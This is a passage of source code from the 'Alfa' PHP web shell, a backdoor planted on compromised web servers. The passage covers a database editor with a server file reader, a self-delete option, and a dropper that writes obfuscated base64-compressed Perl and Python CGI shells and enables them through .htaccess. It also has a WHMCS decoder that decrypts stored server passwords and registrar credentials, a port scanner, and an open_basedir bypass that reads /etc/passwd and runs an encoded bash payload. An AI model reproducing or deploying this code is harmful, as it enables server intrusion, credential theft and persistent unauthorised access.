  5293.     $cacheMsg = '<a href="javascript:void(0);" onclick=fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\')>Edit</a>';
  5294. }else{
  5295.     $cacheMsg ='-';
  5296. }
  5297. echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
  5298. $line = $line==1?2:1;
  5299. foreach($item as $key => $value){
  5300. if($value == null)
  5301. echo '<td><i>null</i></td>';
  5302. else
  5303. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
  5304. }
  5305. echo '</tr>';
  5306. }
  5307. echo '</table>';
  5308. } else {
  5309. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  5310. }
  5311. }
  5312. echo('</form>');
  5313. if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){
  5314. $data = explode(':',$_POST['alfa3']);
  5315. echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
  5316. echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
  5317. if($data[1] != '0'){
  5318. $data[2] = __ZGVjb2Rlcg($data[2]);
  5319. $data[2] = str_replace('"','',$data[2]);
  5320. $fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
  5321. $fetch['__ALFAKEY'] = $data[1];
  5322. $fetch['__ALFAKEYVAL'] = $data[2];
  5323. }else{
  5324. $d = __ZGVjb2Rlcg($data[2]);
  5325. $fetch = json_decode($d, true);
  5326. }
  5327. foreach($fetch as $key => $value){
  5328. if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
  5329. $value = htmlspecialchars($value);
  5330. echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
  5331. }
  5332. echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
  5333. }
  5334. if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){
  5335. $data = json_decode($_POST['alfa2'], true);
  5336. $alfadata = $data['__ALFADATA'];
  5337. $data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
  5338. $keyval = array();
  5339. echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
  5340. echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
  5341. $set = '';
  5342. foreach($data as $key => $value){
  5343. if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
  5344. if($data2['__ALFAKEY']==$key){
  5345. $keyval['__ALFAKEY'] = $key;
  5346. $keyval['__ALFAKEYVAL'] = $value;
  5347. }
  5348. $set .= "`$key` = '".addslashes($value)."',";
  5349. $value = htmlspecialchars($value);
  5350. echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
  5351. }
  5352. unset($data['__ALFADATA']);
  5353.  
  5354. echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
  5355.  
  5356. if(!isset($data2['__ALFAKEY'])){
  5357. $where = '';
  5358. foreach($data2 as $key => $value){
  5359. if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
  5360. $value = addslashes($value);
  5361. $where .= "`$key` = '$value' AND ";
  5362. }
  5363. $where = substr($where, 0, -4);
  5364. }else{
  5365. $where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
  5366. }
  5367. $set = substr($set, 0, -1);
  5368. $db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
  5369. if($db->error())
  5370. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  5371. else echo("Success...!");
  5372. }
  5373. if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){
  5374. echo "<p>Query:</p><form onsubmit='fs(this);return false;'>
  5375. <input type='hidden' name='alfa1' value='query'/>
  5376. <textarea name='query' style='width:100%;height:100px'>";
  5377. echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
  5378. echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
  5379. }
  5380. echo "</td></tr>";
  5381. }
  5382. echo "</table></form><br/>";
  5383. if($_POST['type']=='mysql') {
  5384. $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
  5385. if($db->fetch())
  5386. echo "<form onsubmit=\"fs('3',this.f.value);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
  5387. }
  5388. if(@$_POST['alfa1'] == 'loadfile'){
  5389. $file = $db->loadFile($_POST['alfa2']);
  5390. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
  5391. }
  5392. }else{
  5393. echo htmlspecialchars($db->error());
  5394. }
  5395. echo '</div>';
  5396. alfafooter();
  5397. }
  5398. function alfaselfrm(){
  5399. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
  5400. echo(__pre().'<center>');
  5401. if(@unlink($GLOBALS['__file_path'])){
  5402. echo('<b>Shell has been removed</i> :)</b>');
  5403. }else{
  5404. echo 'unlink error!';
  5405. }
  5406. echo('</center>');
  5407. }
  5408. if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
  5409. echo "<div class=header>";
  5410. echo "
  5411. <center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
  5412. echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
  5413. echo '</p></center></div>';
  5414. }
  5415. }
  5416. function alfacgishell(){
  5417. alfahead();
  5418. $div = "";
  5419. if(!in_array($_POST['alfa1'],array('perl','py'))){
  5420. $div = "</div>";
  5421. echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
  5422. }
  5423. if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
  5424. @mkdir('cgialfa',0755);
  5425. @chdir('cgialfa');
  5426. alfacgihtaccess('cgi');
  5427. $name = $_POST['alfa1'].'.alfa';
  5428. $perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("H4sIAAAAAAAA/6UZDXfTRvKvLBthSRBbtktazrJcQuJA3iUhlxju9aJgZGlt70OWVH2QpMb97Tezu7KkEKC0yUORZud7ZmdmlyJj5PT4dDwYvPQy9vMzuwDAEQ+ZBETeignQwU1AdG+WTRMvX+q25i/4NOApcQg8EcsoFw2ta5q29l8enU1guWtrZ5ODVXDJEviiLWprbyN+W0FsgBzEq5UXBRO+YnGRHxapl/M4gtUekF8u45vDO5DB/TdFnhQ5wm0NtBKC4WvB8jBe8Ih8/ozvyU3BA0MbmvhNvXDuoYhSoKFU+5VUig1ITSlTIJ+DwXVk6gcU8GhyE1DAOAdL7/OjritQLES4YOAY5udx2sQh/VGrR3qjVl/g4ltPwIAoK2bkgnnBuZeCy9dh7HshMZ7wyAQeL6aEz+FpK7DGd4kG7/D8yO7g+ckLQe5pEeY88dL8KE5Xh17uAak2Pnu31g/enE3GZ5Pp5Lfzsb4hzp/EWpXIrjUH9HYA+DaZxUUUeOmdY3Semppl87khOVyM//N2fDmZno4nr98cAg/2O6GvxhNqrjUebQUB0sVv08vJxfHZK31jb1iYfZvF+ZtL5JGC6cbl5PD4DKzh0e49vU/GZ68mr/WNaW+27P6uTaDwSwUBtfV2W+9oPftFyDPMriwJeW5YWxRL6APOfQ0asvRlHCCVhthXvesmGDRwUzfCf5/hT2SVy0jxwdZKYr18/ZNkgkKzAJVHa30Ouw+VRnuIQKpYAHdcxrx3XIq2uLQkk/i92pdgTS1rcR+WIQy8A0nk9G1licav4ZU/fQrOKQES/33nqZAoVKwvAXfDvVFKQBYqBSATlYniDVkY742GW0zzswBo8KWZQsUt7mOj0zGtxPM/GtSnu2TJbg2tZ5rWgglDUJKwFSjsDaYXW78Q+acC1yoDBiYyz1/CBzG6pNMh2g6AMVkr49ynFgHxRm0XVZwcyQmxd0nfVEZ+V8kfNKUDZdDtUtzfRsDmPGJQvspVLKZ1TGX1BovF2ySMvQDL9dpfxomhTbwUCuAZBMsU3GoAdNhBkaYsyg95aqJ+K+vKdV3rGva4Nkm9KJuzFJmJtUfG1XvrvetePzG1R3adESqh6h/uGrWEhJf8D5TDo9yAJF1gM2hmtEksqOn9ZyYWlThhkfH2/OTN/uHR8cl4l9BRTQw1zfWMR6s4YDUkYZaspnaSgiBSrZF7wmw/jLMGsSKhpbEsIPe1//fLjhtRhahPlowgQ0L1zkz1w4aXOzolN15GChEJ4JcVvs+ybF6E4V1Hl8mppB55qBr0mkfUlvE7xwUUrQIJ9YqsNSxbWJWGPsSKpaOhAMQRUKx47tB8ybOO/OgEPPNmwNXJ04LZYiXoQIYUzJnlsWcUEct8L2EGi3zw5NuLY+i1SRwBZ6OObUKaUQJI+V3CHLotolUNpWTF8mUcOLJcE8/HHu2AY7RLP+VJfgJ9CUHgktEw9GYsJEDsUOWaFKBZ4kWEA4vpdI6uLBIAWggdkWGWp3G0GLWiWZbY8nmwjCGCxBMxAESJMbQE99GQRzgNZPldCCqDJ5LQuxtEYByYglK2ksF5/tKLFogW+8UKrO9ABMchw9eXd8eB4epbnVzd7PAoYunryemJI7yE8rOr7nVHDESUSC8hlBJRGumckgzyx6E/7dFSM7kiI1XSlF8yRkrFLYXEWfIgYFHJOdgig6urHSzc/HUq70sRIpbwR6WVLhr7FKwSTThleZFGog3jCxFpaNcTWEGqzD33Fkx2prU2FvkVVPo16439EIJoDFfvvfYf++3/ddv/ujYt/bHeKSJZMF8/obtQLC22KPftQQyaR3kbDR6QnN3m1jJfhdhQtlt2iJDRcAl6jYY5z0M2OkDBZHZH9k+O9smE7Z+SNjl4dUzOWRoOLYk0FHk0erKGCTSEEiwTabOzTYv1HPyYD0jKF8vcjj+xFAA3A+l224/DOB3s9Pfm827XvuFBvhz0nnWTW7tMTCiLyLc9g6Hto43Kt7dMCAtDnmQ8s2+WPGdt2BI+WBjFN6mX2BuR7+sVlB0etYX8AZRR4A30OYdxsO2FfBENyAqUCZk9i1MICuAktySLQx4QKHX2DLy6SHGmAd9hBYQNDt4E7Nt2tvQC1KMLv8+Aaqc7/qn7bF9xaqdewItsgEvKNtLfQwV+xAy/SDPwEUlijgn4FcdIY4nc6+u6zmiDikHI5nmpSE94YiO2wpXYCnKPXa+VwFJenZcI7sNukpEkcYoF4yEHbHb8VbD+W9xK3/2CKj8QzwekJV4Q8GjRVk7KcqjKA7L35QpDTRC+waBAaD3YyliTlH6NvK5pX1O+FFzTpW7PzpH4KQUPej8Dmkr8vef+3t7zMvG73cfVDvGKPLY3WL5xgw0tuTVnOP3GEdamb1VlcDXW4zkgZAb2qNlCSHToTlf8QGGNE+lKh8IXpkbtU74KtWrfS4ZOFwB0FjCTpkGVrJouVBMlCgJJR1dkOKtKCXiEkcwLSAvS9xPPOHRh8qcAq68XixU0/I4fr4bWbESusf5GeVV/hzl2biLd7NAeDBJSS/QeJT7sJdw/4GihJ34rxzu0D4rmyCJoECmt57DrHPqOpYEXeWVfQhJQo2HXTr8/7vefi5XLSnNysOCqNs5GSm0CtTeC8yxYn8cEmz5LIcA4BHV0iZcH+MDG0mwRR3EM9pZTkNJ7RDutB8YfY9uHOrTiCA/0FfzFrMEUwhpPa3LUDcIJJPgxFgLktdbOUxh28ERXnb9rPWlExBEc4irmEjlH6Cqfuz/9Ai61ddBze9WAKolh5cX3KGrOodWA8yVNfzZnvT2gqalV4l+7GqF2NQ2iM2Y/PA3KleW9Jej8jVWYlhxXX8JOWzdmSFeHSKu7no7u6hux6v/QhOlXE+Y/nU+3o9aPjKJ/a7ICgEweSO46A6wWJbkvp0yoUNvZr/sXZzJfpus97HI2bM6NimQ0oo3ZWD6/S7+USkZiBg65/9GhEHw/juYcdpur76eM3MUFnFvg5VdIAJUBQCQSQk6ARA2Fcw8+7K1Or2M4p1WDJWToPxoqm9eAa+D0SG5cc+2FHqjbNatJUKASduszhiV55d3yVbEiORCTGM6IX7lTzBjYHhiZWZ7BxrfML3JWMlxvWtsrOPteOm1vuC4PLo7PJ9Oz/dMxHDNru73CGF+8G19sMZqna1Jex9iaTN0ShIdW7aKISmUcEjDcFtOZuJyVp2kfr8C0xqD9AFaAWPJSoIH6QV1ufsCTdGMN40XFwbyhAl4TvHezJ37gZk/xxgkvz2CwgBOivO75LoF9n0LGv3lFqi5oOzWovdHehMEDR4nKPdQPiFuv6S6F6qtY4aKSWwGV+V9xjWT8wbQ3rXsnHLy/wXvfv9RRth3DfVFPjhqmLO73WuIw4J/KBqGGQ5xmBn0cx/SRGD+k5YOHuomaMUUDqgKybUCySYOI0TD5tqjGYFoKL4dKksY3maP3uzrJEphJ/CWDoqKLygCiRTqorMaMUqdPc92qLqvKBPiLcawbU0+Pen3QLo9frfX9k4tTcQ3qtprb35b14ytFQd0of/EfDcD2s9Or8g3v6chnaouLKwWUmLvbemPi0SdkxrCxPgJWU3XgxRvQ1I1MvE1VCaBN8QC7AWndRnGsMlJo+GU13GzKFLLK+JQxtpLaSEbt1lfHJLt1b1Kz/w8wblS+FRoAAA==")));';;
  5429. $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
  5430. if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
  5431. if(__write_file($name,$code)){
  5432. @chmod($name,0755);
  5433. echo '<iframe src="'.'cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
  5434. }
  5435. }
  5436. echo $div;
  5437. alfafooter();
  5438. }
  5439. function alfaWhmcs(){
  5440. alfahead();
  5441. echo '<div class=header>';
  5442. function decrypt($string,$cc_encryption_hash){
  5443. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  5444. $hash_key = _hash($key);
  5445. $hash_length = strlen ($hash_key);
  5446. $string = __ZGVjb2Rlcg($string);
  5447. $tmp_iv = substr ($string, 0, $hash_length);
  5448. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  5449. $iv = $out = '';
  5450. $c = 0;
  5451. while ($c < $hash_length)
  5452. {
  5453. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  5454. ++$c;
  5455. }
  5456. $key = $iv;
  5457. $c = 0;
  5458. while ($c < strlen ($string))
  5459. {
  5460. if (($c != 0 AND $c % $hash_length == 0))
  5461. {
  5462. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  5463. }
  5464. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  5465. ++$c;
  5466. }
  5467. return $out;
  5468. }
  5469. function _hash($string)
  5470. {
  5471. if(function_exists('sha1'))
  5472. {
  5473. $hash = sha1 ($string);
  5474. }
  5475. else
  5476. {
  5477. $hash = md5 ($string);
  5478. }
  5479. $out = '';
  5480. $c = 0;
  5481. while ($c < strlen ($hash))
  5482. {
  5483. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  5484. $c += 2;
  5485. }
  5486. return $out;
  5487. }
  5488. AlfaNum(8,9,10);
  5489. echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
  5490. <input type='hidden' name='form_action' value='2'>";
  5491. $table = array('td1' =>
  5492.  array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  5493.  'td2' =>
  5494.  array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  5495.  'td3' =>
  5496.  array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  5497.  'td4' =>
  5498.  array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  5499.  'td5' =>
  5500.  array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
  5501. );
  5502. create_table($table);
  5503. echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
  5504. if($_POST['alfa5']!=''){
  5505. $db_host=($_POST['alfa7']);
  5506. $db_username=($_POST['alfa3']);
  5507. $db_password=($_POST['alfa4']);
  5508. $db_name=($_POST['alfa5']);
  5509. $cc_encryption_hash=($_POST['alfa6']);
  5510. echo __pre();
  5511. $conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
  5512. $query = mysqli_query($conn,"SELECT * FROM tblservers");
  5513. $num = mysqli_num_rows($query);
  5514. if ($num > 0){
  5515. for($i=0; $i <=$num-1; $i++){
  5516. $v = @mysqli_fetch_array($query);
  5517. $ipaddress = $v['ipaddress'];
  5518. $username = $v['username'];
  5519. $type = $v['type'];
  5520. $active = $v['active'];
  5521. $hostname = $v['hostname'];
  5522. echo("<center><table border='1'>");
  5523. $password = decrypt ($v['password'], $cc_encryption_hash);
  5524. echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
  5525. echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
  5526. echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
  5527. echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
  5528. echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
  5529. echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
  5530. echo "</table><br><br></center>";
  5531. }
  5532. $query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
  5533. $num1 = @mysqli_num_rows($query1);
  5534. if ($num1 > 0){
  5535. for($i=0; $i <=$num1 -1; $i++){
  5536. $v = mysqli_fetch_array($query1);
  5537. $registrar = $v['registrar'];
  5538. $setting = $v['setting'];
  5539. $value = decrypt($v['value'], $cc_encryption_hash);
  5540. if ($value==""){
  5541. $value=0;
  5542. }
  5543. echo("<center>Domain Reseller <br><center>");
  5544. echo("<center><table border='1'>");
  5545. echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
  5546. echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
  5547. echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
  5548. echo "</table><br><br></center>";
  5549. }
  5550. }
  5551. }else{__alert('<font color="red">tblservers is Empty...!</font>');};
  5552. }
  5553. echo "</div>";
  5554. alfafooter();
  5555. }
  5556. function alfaportscanner(){
  5557. alfahead();
  5558. echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
  5559. <form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
  5560. <input type="hidden" name="y" value="phptools">
  5561. <div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
  5562. <div class="txtfont">Port start: </div> <input id="text" size="5" type="text"  name="start" value="80"/>
  5563. <div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
  5564. </form></center><br>';
  5565. $start = strip_tags($_POST['alfa2']);
  5566. $end = strip_tags($_POST['alfa3']);
  5567. $host = strip_tags($_POST['alfa4']);
  5568. if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
  5569. echo __pre();
  5570. $packetContent = "GET / HTTP/1.1\r\n\r\n";
  5571. if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
  5572. else{
  5573. $packetContent = str_replace(array("\r","\n"), "", $packetContent);
  5574. $packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
  5575. }
  5576. for($i = $start; $i<=$end; $i++){
  5577. $sock = @fsockopen($host, $i, $errno, $errstr, 3);
  5578. if($sock){
  5579. stream_set_timeout($sock, 5);
  5580. fwrite($sock, $packetContent."\r\n\r\n\x00");
  5581. $counter = 0;
  5582. $maxtry = 1;
  5583. $bin = "";
  5584. do{
  5585. $line = fgets($sock, 1024);
  5586. if(trim($line)=="")$counter++;
  5587. $bin .= $line;
  5588. }while($counter<$maxtry);
  5589. fclose($sock);
  5590. echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
  5591. echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
  5592. }
  5593. flush();
  5594. }
  5595. }
  5596. echo '</div>';
  5597. alfafooter();
  5598. }
  5599. function alfacgihtaccess($m,$d='', $symname=false){
  5600. $readme = "";
  5601. if($symname){$readme="\nReadmeName ".trim($symname);}
  5602. if($m=='cgi'){
  5603. $code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
  5604. }elseif($m=='sym'){
  5605. $code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
  5606. }elseif($m=='shtml'){
  5607. $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
  5608. }
  5609. @__write_file($d.'.htaccess',$code);
  5610. }
  5611. function alfabasedir(){
  5612. alfahead();
  5613. echo '<div class=header>
  5614. <center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
  5615. $passwd = _alfa_file('/etc/passwd');
  5616. if(is_array($passwd)){
  5617. $users = array();
  5618. $makepwd = alfaMakePwd();
  5619. $basedir = @ini_get('open_basedir');
  5620. $safe_mode = @ini_get('safe_mode');
  5621. if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
  5622. $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
  5623. alfaWriteTocgiapi("basedir.alfa",$bash);
  5624. $bash_users  = alfaEx("cd alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
  5625. $users = json_decode($bash_users, true);
  5626. $x=count($users);
  5627. if($x>=2){array_pop($users);--$x;}
  5628. }
  5629. if(!$basedir&&!$safe_mode){
  5630. $x=0;
  5631. foreach($passwd as $str){
  5632. $pos = strpos($str,':');
  5633. $username = substr($str,0,$pos);
  5634. $dirz = str_replace("{user}", $username, $makepwd);
  5635. if(($username != '')){
  5636. if (@is_readable($dirz)){
  5637. array_push($users,$username);
  5638. $x++;
  5639. }}}
  5640. }
  5641. echo '<br><br>';
  5642. echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
